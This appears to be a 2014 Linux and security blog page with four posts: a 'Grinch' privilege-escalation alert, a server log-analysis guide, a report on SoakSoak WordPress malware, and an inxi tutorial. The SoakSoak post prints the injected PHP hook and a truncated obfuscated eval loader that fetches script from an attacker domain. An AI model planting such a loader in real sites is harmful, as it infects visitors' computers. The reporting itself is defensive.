Open Source & Digital Media for Newbies
 Open Source & Digital Media for Newbies
  Home | Open Source |  Android | Apple | Windows |  Cloud | Products |  Security |  Feed IT & Digital Media Blog 
Dec 162014
 



A security alert by cloud and security services provider Alert Logic warns of a dangerous vulnerability in the Linux authorization system that allows privilege escalation through “wheel” to unauthorised users.

Wheel is a special user group controlling access to su command, and thereby superuser privileges.

The vulnerability permits unauthorized users to get root access, which in essence means gaining control of the entire system to do whatever malicious actions they want to.

Named “Grinch” (after Dr.Seuss’ unsavory fictional character), the vulnerability is considered serious because of Linux’ sway in e-commerce deployments.

Surveys have found that Linux/Unix power 65% of web servers.

The vulnerability is said to span all Linux distros including mobile platforms like Android that are based on Linux.

Although no patch is available yet, recommendations to avoid the exploit being triggered include studying logs to monitor user actions on the system and avoiding installation tools like PKCon (PackageKit Console Client). Safer to stick with installation tools like Yum or dnf.

According to Alert Logic’s Chief Security Evangelist Stephen Coty, the fix for the vulnerability lies in managing PolKit authorization rules or properly managing group privileges for users.

Red Hat, the maintainer of PolKit, is said to have opened a ‘trouble ticket’ to examine the vulnerability.

Related Content
Stephen Coty Blog Post
 Posted by at 6:34 pm
Dec 152014
 

The world has gone to dogs in the online arena.

The attacks are increasing and they’re coming fast and furious from Vietnam, Romania, Thailand, France, China, Ukraine, Russia, Turkey, U.S., Canada and all over the globe.

Both private individuals and government agencies are on the rampage.

You cannot stop all of the attacks but with some effort you can prevent a lot of them before they inflict catastrophic damage on your web site or network.

Log File Analysis

Studying log files on your Linux server is a good way to spot suspicious activity early and stop attacks before they start or get out of hand.

In this post, we will examine different log files that can help to identify malicious or potentially bad actors based mostly on IP addresses.

As always in tackling web security, there’ll be some false positives but that’s the price you pay for security.

Not every visitor from Ukraine, Iran, France, UK or Turkey nor every Amazon Web services IP address is a bad element.

Types of Log Files

Linux systems log everything that happens on the server and store the activity in various files under etc/var/log and etc/var/log/httpd folders.

From a security perspective, the following logs are of interest to us.

1) vsftpd.log – stores all FTP login attempts (including failed attempts) to your server
2) maillog – includes all e-mail sent and received by various users on your server, connections to mail server and postfix/smtpd login failures
3) messages – saves all attempts like relaying, DDOS attacks (mod_evasive attacks,) SMTP attacks, fail2ban actions, invalid smtp saslauthd logins
4) access_log – saved in /log/httpd folder and tells the story of who accessed your server including various bots and their IP addresses
5) error_log – located in /log/httpd folder provides useful information about errors generated on your web server

Now how do we access these various log files.

You can access the log files either through command line or via GUI panels like Webmin.

Command Line

From the command line you can find out malicious visitors or potential attackers by running netstat or ss commands.

While these are extremely useful, they have some limitations as they will not tell you clearly who did what a few hours back, yesterday or two days back on your web site.

Also, you may have to run netstat command multiple times with different options to figure out the attacking IP.

It is here that analyzing log files directly comes in handy.

Log files can be analyzed in two ways:

1) With the command less
2) Using tailf

The less command lets you examine log files for four or five days.

Whereas tailf allows you to monitor log files live as they are being generated.

less

To access log files on your Linux system, you have to first log in as root or superuser.

Once you are in the log folder, you can read the log files through less command.

[root@christyserver]# cd /etc/var/log
[root@christyserver log]# less vsftpd.log

When the log file opens in command line it starts at the beginning of the file. The document may contain logs for three or four days.

The beginning of the log file contains logs for older dates. This is because when the logs are saved, the newest entries are appended at the end of existing log file entries.

You can use various options to navigate the log file opened through less.
a) Page Up or b – Scroll back one page
b) Page Down or press space bar – scroll forward one page
c) Up arrow – scroll up one line
d) Down arrow – scroll down one line
e) G – Move to the end of the text file
f) 1G or g – move to the beginning of the text file
g) /characters – search forward to the next occurrence of characters
h) n -search for the next occurrence of previous search
i) h – display help screen for less
j) q – quit less

Here’s an example of useful stuff gleaned from the less command:

[root@christyserver httpd]#  less access_log
58.96.168.215 - - [15/Dec/2014:18:55:14 -0500] "GET /ghgh/ghg/gh.php HTTP/1.1" 301 329 "-" "-"
58.96.168.215 - - [15/Dec/2014:18:55:14 -0500] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 342 "-" "-"
58.96.168.215 - - [15/Dec/2014:18:55:15 -0500] "GET /pma/scripts/setup.php HTTP/1.1" 301 335 "-" "-"
58.96.168.215 - - [15/Dec/2014:18:55:15 -0500] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 339 "-" "-"

In the above example, a bad element from Hong Kong is trying to play mischief with my PHP setup. So our next step ought to be to drop this IP and prevent it from accessing the server again. Continue reading »

 Posted by at 8:25 pm
Dec 152014
 

Sorry folks, it’s not just big corporations like Staples, Sony, Target etc that are being attacked by rogue elements.

Several 100,000 WordPress sites, including presumably many belonging to average Joes, have been infected with a Javascript malware seeded by SoakSoak.ru, according to security services provider Sucuri.

The malware causes malicious software to be downloaded to a visitor’s computer.

WordPress is used by individuals, small businesses (restaurants, publishers, contractors etc) and non-profits to run blogs and web sites.

The attack from SoakSoak.ru is said to have prompted Google to blacklist over 11,000 domains. Being bbacklisted by Google is often a kiss of death to a small business or non-profit.

Soak.Soak Malware

Sucuri’s preliminary analysis shows correlation between the new malware and the Revslider vulnerability incidents from September 2014.

The SoakSoak malware modifies the file wp-includes/template-loader.php and includes the following content:

function FuncQueueObject()
{
wp_enqueue_script(“swfobject”);
}
add_action(“wp_enqueue_scripts”, ‘FuncQueueObject’);

This supposedly causes wp-includes/js/swobject.js to be loaded on every page on the site with the below malware:

eval(decodeURIComponent
(“%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B”));

Security experts have found that the malware when decoded loads a javascript malware from the SoakSoack.ru domain, specifically this file: hxxp://soaksoak.ru/xteas/code

Currently, the best fix for the SoakSoak malware is to replace the infected files with clean copies or ideally with a fresh WordPress install.

You can check if your favorite WordPress site has malware by using Securi’s free scanner.

 Posted by at 3:31 pm
Dec 132014
 

Although there are solid GUI tools like hardinfo and sysinfo that provide a cornucopia of hardware, software and even networking information about your Linux system, nothing beats inxi for those who live, breathe and die on the command line.

The beauty of inxi is that it provides its output in an easy to read format.

How to Install Inxi

Unfortunately inxi does not come installed by default on any of the distros (Linux Mint, Ubuntu, Red Hat and Kali) I’ve explored.

But installing inxi is not a hard task.

It takes no more than a couple of minutes to get it running on your Linux system.

* Ubuntu/Debian users should run the below command to install inxi on their systems (inxi script may come pre-installed on Linux Mint):

# sudo apt-get install inxi

* CentOS/Fedora users must run the following command:

# sudo yum install inxi

inxi – Various Commands

Now let’s take a dekko at some of the key inxi commands.

Single Line
$ inxi -c 6
CPU~Quad core Intel Core2 Quad CPU Q9400 (-MCP-) clocked at 2659.881 Mhz Kernel~3.13.0-24-generic i686 
Up~2 days Mem~1350.7/3875.8MB HDD~2000.4GB(8.4% used) Procs~198 Client~Shell inxi~1.8.4

You get the essentials of your Linux system including processor, harddisk, memory etc on a single line (on your terminal, the info should be in a single line but I’ve split up the output above for lack of space).

Display Basic Information
$ inxi -b
System:    Host: Sasha Kernel: 3.13.0-24-generic i686 (32 bit) Desktop: Gnome Distro: Linux Mint 17.1 Rebecca
Machine:   System: Dell product: OptiPlex 780
           Mobo: Dell model: 03NVJ6 version: A02 Bios: Dell version: A14 date: 08/21/2012
CPU:       Quad core Intel Core2 Quad CPU Q9400 (-MCP-) clocked at 2659.881 MHz 
Graphics:  Card: Intel 4 Series Chipset Integrated Graphics Controller 
           X.Org: 1.15.1 drivers: intel (unloaded: fbdev,vesa) Resolution: 1600x900@60.0hz 
           GLX Renderer: Mesa DRI Intel Q45/Q43 x86/MMX/SSE2 GLX Version: 2.1 Mesa 10.1.0
Network:   Card: Intel 82567LM-3 Gigabit Network Connection driver: e1000e 
Drives:    HDD Total Size: 2000.4GB (8.4% used)
Info:      Processes: 199 Uptime: 3 days Memory: 1408.6/3875.8MB Client: Shell inxi: 1.8.4
Display Audio Card Info
$ inxi -A
Audio:     Card: Intel 82801JD/DO (ICH10 Family) HD Audio Controller driver: snd_hda_intel
           Sound: Advanced Linux Sound Architecture ver: k3.13.0-24-generic
Show Graphics Card Info

Check out the below command for details on graphics card in your Linux system.

$ inxi -G
Graphics:  Card: Intel 4 Series Chipset Integrated Graphics Controller 
           X.Org: 1.15.1 drivers: intel (unloaded: fbdev,vesa) Resolution: 1600x900@60.0hz 
           GLX Renderer: Mesa DRI Intel Q45/Q43 x86/MMX/SSE2 GLX Version: 2.1 Mesa 10.1.0
Show CPU Info
$ inxi -C
CPU:       Quad core Intel Core2 Quad CPU Q9400 (-MCP-) cache: 3072 KB flags: (lm nx sse sse2 sse3 sse4_1 ssse3 vmx) 
           Clock Speeds: 1: 2659.881 MHz 2: 2659.881 MHz 3: 2659.881 MHz 4: 2659.881 MHz
Information on Drives

The below inxi command provides details on both hard drives and optical drives.

$ inxi -d
Drives:    HDD Total Size: 2000.4GB (8.4% used) 1: id: /dev/sda model: SAMSUNG_ST2000LM003 size: 2000.4GB 
           Optical: /dev/sr0 model: N/A dev-links: cdrom
           Features: speed: 8x multisession: yes audio: yes dvd: yes rw: cd-r,cd-rw,dvd-r,dvd-ram
Display Machine Information

The following command should give you information on system name, model, motherboard, bios

$ inxi -M
Machine:   System: Dell product: OptiPlex 780
           Mobo: Dell model: 03NVJ6 version: A02 Bios: Dell version: A14 date: 08/21/2012
Display WAN IP Address
$ inxi -i
Network:   Card: Intel 82567LM-3 Gigabit Network Connection driver: e1000e 
           IF: eth1 state: up speed: 100 Mbps duplex: full mac: 84:2b:2b:ba:ec:21
           WAN IP: 213.238.170.107 IF: eth1 ip: 10.0.1.5
Show Partition Information
$ inxi -p
Partition: ID: / size: 1.8T used: 158G (10%) fs: ext4 ID: /boot size: 236M used: 44M (20%) fs: ext2 
           ID: swap-1 size: 4.12GB used: 0.02GB (1%) fs: swap
Display Full Information

Of all the inxi commands, inxi -F provides the maximum data covering all aspects of the computer.

$ inxi -F
System:    Host: Sasha Kernel: 3.13.0-24-generic i686 (32 bit) Desktop: Gnome Distro: Linux Mint 17.1 Rebecca
Machine:   System: Dell product: OptiPlex 780
Mobo: Dell model: 03NVJ6 version: A02 Bios: Dell version: A14 date: 08/21/2012
CPU:       Quad core Intel Core2 Quad CPU Q9400 (-MCP-) cache: 3072 KB flags: (lm nx sse sse2 sse3 sse4_1 ssse3 vmx)
Clock Speeds: 1: 2659.881 MHz 2: 2659.881 MHz 3: 2659.881 MHz 4: 2659.881 MHz
Graphics:  Card: Intel 4 Series Chipset Integrated Graphics Controller
X.Org: 1.15.1 drivers: intel (unloaded: fbdev,vesa) Resolution: 1600x900@60.0hz
GLX Renderer: Mesa DRI Intel Q45/Q43 x86/MMX/SSE2 GLX Version: 2.1 Mesa 10.1.0
Audio:     Card: Intel 82801JD/DO (ICH10 Family) HD Audio Controller driver: snd_hda_intel
Sound: Advanced Linux Sound Architecture ver: k3.13.0-24-generic
Network:   Card: Intel 82567LM-3 Gigabit Network Connection driver: e1000e
IF: eth1 state: up speed: 100 Mbps duplex: full mac: 84:2b:2b:ba:ec:21
Drives:    HDD Total Size: 2000.4GB (8.4% used) 1: id: /dev/sda model: Samsung_ST2000LM003 size: 2000.4GB
Partition: ID: / size: 1.8T used: 158G (10%) fs: ext4 ID: /boot size: 236M used: 44M (20%) fs: ext2
ID: swap-1 size: 4.12GB used: 0.02GB (1%) fs: swap
RAID:      No RAID devices detected - /proc/mdstat and md_mod kernel raid module present
Sensors:   System Temperatures: cpu: 30.0C mobo: N/A
Fan Speeds (in rpm): cpu: N/A
Info:      Processes: 194 Uptime: 2 days Memory: 1113.1/3875.8MB Client: Shell inxi: 1.8.4

Go ahead, take inxi for a spin on your Linux system.

You’ll be surprised at how much information you can gather on your system via the inxi command.

Don’t forget to check the man pages for inxi by running:

$ man inxi

on the command line to get a list of the various inxi options.

Related inxi Content
Information about Inxi
Inxi Installation
 Posted by at 10:48 pm